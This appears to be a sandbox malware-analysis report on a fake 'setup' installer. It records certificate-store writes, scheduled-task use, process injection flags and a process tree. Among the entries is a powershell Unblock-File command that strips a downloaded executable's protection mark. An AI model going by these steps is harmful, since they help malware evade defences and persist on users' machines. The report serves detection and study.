| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\clck.ru\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zSC8B8A64B\setup.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\setup_bQFFnFHGSf.zip.jujpt4s.partial:Zone.Identifier | C:\Windows\system32\browser_broker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-ITVKJ.tmp\PIPT5ys120HSNpWQJCG.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://ify.ac/1IZk"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe
"C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe"
C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EMQ60.tmp\setup_bQFFnFHGSf.tmp" /SL5="$3042A,6120275,56832,C:\Users\Admin\Desktop\setup_bQFFnFHGSf.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" b8c38ab23cb29b463990bcb44875ebb1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 964
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1180
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1228
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1164
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1696
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1804
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1844
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1808
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1880
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1948
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2168
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2112
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1532
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2220
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2336
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2404
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\7fzs0Ncz\9cz6EQW8Wv4594PV7Yi2.exe"
C:\Windows\SysWOW64\cmd.exe
